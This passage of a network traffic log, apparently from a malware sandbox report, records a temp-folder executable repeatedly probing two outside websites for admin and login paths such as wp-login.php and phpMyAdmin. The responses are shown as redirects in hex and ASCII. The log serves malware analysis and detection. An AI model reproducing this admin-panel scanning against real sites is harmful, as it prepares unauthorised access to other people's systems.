Nov 30, 2023 11:23:29.367239952 CET	443	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:29 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:23:30.215626001 CET	257	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
Nov 30, 2023 11:23:30.394212961 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:30 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
310	192.168.2.4	61596	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:29.434159040 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:29.615855932 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:29 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
311	192.168.2.4	61922	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:29.555989027 CET	224	OUT	GET /administrator/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:29.734601974 CET	445	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:29 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:23:30.543004036 CET	273	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/administrator/
Nov 30, 2023 11:23:30.724894047 CET	454	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:30 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
312	192.168.2.4	62835	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:29.856584072 CET	219	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:30.036391973 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:29 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
313	192.168.2.4	63032	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:29.912296057 CET	221	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:30.092103004 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:29 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
314	192.168.2.4	63988	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:30.148082018 CET	214	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:30.327898026 CET	435	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:30 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/pma/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
315	192.168.2.4	64005	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:30.148170948 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:30.327918053 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:30 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
316	192.168.2.4	49184	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:30.623949051 CET	221	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:30.803874969 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:30 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
317	192.168.2.4	50297	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:31.005515099 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:31.185209990 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:31 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
318	192.168.2.4	50548	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:31.091231108 CET	225	OUT	GET /administrator/ HTTP/1.1 Host: a5a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:31.282088041 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:31 GMT content-length: 0 server: NginX
Nov 30, 2023 11:23:31.287220001 CET	274	OUT	GET /administrator/index.php HTTP/1.1 Host: a5a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://a5a.com/administrator/
Nov 30, 2023 11:23:31.477912903 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:31 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
319	192.168.2.4	50561	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:31.109414101 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:31.289128065 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:31 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
320	192.168.2.4	51088	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:31.289134979 CET	216	OUT	GET /admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:31.468650103 CET	437	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:31 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
321	192.168.2.4	51261	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:31.356744051 CET	219	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:31.535516024 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:31 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
322	192.168.2.4	52293	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:31.682425022 CET	222	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:31.863265991 CET	443	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:31 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:23:32.644679070 CET	257	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
Nov 30, 2023 11:23:32.825741053 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:32 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
323	192.168.2.4	52417	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:31.703613997 CET	223	OUT	GET /wp-login.php HTTP/1.1 Host: a5a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:31.893961906 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:31 GMT content-length: 0 server: NginX
Nov 30, 2023 11:23:31.895482063 CET	258	OUT	GET /wp-admin/ HTTP/1.1 Host: a5a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://a5a.com/wp-login.php
Nov 30, 2023 11:23:32.085436106 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:31 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
324	192.168.2.4	52842	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:31.755841970 CET	214	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
